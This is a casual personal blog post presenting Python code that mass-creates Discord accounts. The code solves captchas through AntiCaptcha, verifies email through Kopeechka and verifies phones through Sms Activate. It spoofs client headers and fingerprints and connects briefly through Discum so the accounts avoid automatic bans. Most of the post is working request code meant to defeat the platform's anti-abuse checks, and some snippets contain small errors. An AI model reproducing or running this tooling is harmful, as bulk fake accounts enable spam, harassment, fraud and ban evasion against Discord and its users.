To be really honest.. I felt really down when I made this. When I'm down I like to keep myself on work so I don't really think about other stuff. This project is one of those kind of projects. I worked on this for 3 days straight: ~18 hours a day. It's now a public archive, and I couldn't care less about it (got 113 stars on Github though!!!)
Look, I love Discord, and I really really really really really hope I can eventually work there. I felt down asf, and stared at my screen. Then thought "would it be possible to create a lot of minions???". That's when this project got born. I'll only go through some snippets here, but if you'd like to read all the code: see it here.
The project makes use of
AntiCaptcha
to solve the captcha to be able to register.
After which it'll register with an email from
Kopeechka
which will then redirect the verification code to my code.
And at the end I'd like to fully verify my generated accounts with SMS verification.
Luckily there's a service that does that as well!
Meet
Sms Activate!!!
It let's you use their api to receive a phone number, then receive the sms code.
The rest of this project is just making requests to Discord.
(The code snippets are from an OOP environment)
Before we can start coding we'll first need to import everything we need.
import requests, json, discum from base64 import b64encode as b import discord_build_info_py
Wowwww what are these imports????
Requests is just the widely known and used module for making requests on Python.
Json is also widely known and used, a module to read and write JSON.
Discum is a library to connect to Discord (without reporting that it's from code).
Base64 does base64 things.
Discord build info is a module that gets the latest information about the Discord client.
Okay, before we can create an account we'll have to start a session on the Discord website. They keep track of us?????
self.session = requests.Session() self.build_num = discord_build_info_py.getClientData('stable')[0] self.useragent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" # Receive Cloudflare cookies response = self.session.get('https://discord.com/register') self.dcfduid = response.headers['Set-Cookie'].split('__dcfduid=')[1].split(';')[0] self.session.cookies['__dcfduid'] = self.dcfduid self.sdcfduid = response.headers['Set-Cookie'].split('__sdcfduid=')[1].split(';')[0] self.session.cookies['__sdcfduid'] = self.sdcfduid self.session.cookies['locale'] = 'en' self.super_properties = b(json_dumps({ "os": "Windows", "browser": "Firefox", "device": "", "system_locale": "en-US", "browser_user_agent": self.useragent, "browser_version": "90.0", "os_version": "10", "referrer": "", "referring_domain": "", "referrer_current": "", "referring_domain_current": "", "release_channel": "stable", "client_build_number": int(build_num), "client_event_source": None }, separators=(',', ':')).encode()).decode() # set headers self.session.headers.update({ "Accept": "*/*", "Accept-Language": "en", "Cache-Control": "no-cache", "Connection": "keep-alive", "Pragma": "no-cache", "Content-Type": "application/json", "Origin": "https://discord.com/", "Referer": "https://discord.com/", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "User-Agent": self.useragent, "X-Super-Properties": self.super_properties, "Cookie": "__dcfduid=" + self.dcfduid + "; __sdcfduid=" + self.sdcfduid, "TE": "Trailers" }) # get fingerprint (so they can track me :0) response = self.session.get('https://discord.com/api/v9/experiments').json() self.fingerprint = response['fingerprint'] self.session.headers.update({'x-fingerprint': response['fingerprint']})
YES I KNOW IT'S A LOT. This code basically tells Discord hi.
It makes a request to the Discord webpage to get Cloudflare cookies,
then sets the headers for the session with all the information of the client.
And last it makes a request to the experiments endpoint to receive a fingerprint token.
Sooo, next is creating a Discord account. For this we'll have a captcha token ready (received from Anti Captcha), let's make the request:
response = self.session.post("https://discord.com/api/v9/auth/register", hreaders={ "referer": "https://discord.com/register", "authorization": "undefined" # soooooooo extra }, json={ "captcha_key": captcha_token, "consent": True, "date_of_birth": self.date_of_birth, "email": self.email, "fingerprint": self.fingerprint, "gift_code_sku_id": None, "invite": None, "password": password, "username": username }) self.token = response["token"] self.username = username self.password = password
Now you'll actually see what we did all the knocking on the door for.
You can't access Discord API endpoints without Cloudflare cookies.
You can't register without a ✨fingerprint✨.
This code makes the request to Discord wanting to register,
it also saves the authorization token after registering.
Next is to verify our email address,
let's pretend like we got a variable called token
which contains the email verification token.
Oh, and we also have another captcha token (cus discord loves adding captcha's to fricking ✨everything✨)
response = self.session.post("https://discord.com/api/v9/auth/verify", headers={ "sec-ch-ua": "" Not;A Brand";v="99", "Firefox";v="91", "Chromium";v="91"", "referer": "https://discord.com/verify", "authorization": self.token }, json={ "captcha_key": captcha_token, "token": token }).json() self.token = response["token"]
Woooshhh, makes request, verifies the email address and receives a new authentication token :D
The next part is very very very very very very important. You can't verify your phone number without going online at least once.. What I mean is, if you try to access the phone verification API's without going online, Discord will automatically ban the newly created Discord account.
So, what are we gonna do about it you're asking???
Just go online ofcourse, this is why we have Discum
bot = discum.Client(token=self.token, log=False, user_agent=self.useragent, build_num=self.build_num) @bot.gateway.command def websocket_activate(resp): if resp.event.ready_supplemental: bot.gateway.close() bot.gateway.run()
This creates a new Discum session. It tells Discum to close the connection as soon as the connection is established. Then starts the connection.. That's really all.
Now we can finally ask Discord to send us a SMS 😩
(yet again with captcha®)
response = self.session.post("https://discord.com/api/v9/users/@me/phone", headers={ "referer": "https://discord.com/channels/@me", "authorization": self.token }, json={ "captcha_key": captcha_token, "change_phone_reason": "user_action_required", "phone": "+" + number }) if response.status_code == 204: return True # discord is happy return False
This makes a request to Discord, requesting to change my phone number. I received the phone number before from Sms activate.
We have received the code from Sms activate!!! (let's at least pretend like we did).
I've put the code in a variable called code
.
This is the last step, make a request to Discord with the code.
I mean *cough* 2 requests??!?!?!?!
response = self.session.post("https://discord.com/api/v9/phone-verifications/verify", headers={ "referer": "https://discord.com/channels/@me", "authorization": self.token }, json={ "code": code, "phone": "+" + number }).json() smsToken = response["token"] response = self.session.post("https://discord.com/api/v9/users/@me/phone", headers={ "referer": "https://discord.com/channels/@me", "authorization": self.token }, json={ "change_phone_reason": "user_action_required", "password": self.password, "phone_token": smsToken })
Yeah, I don't really understand it either. They first let you make a request to verify the code works, they return a code. Then you use that code to change your phone number. Frfr too much work
I mean, this is it. Bye suckers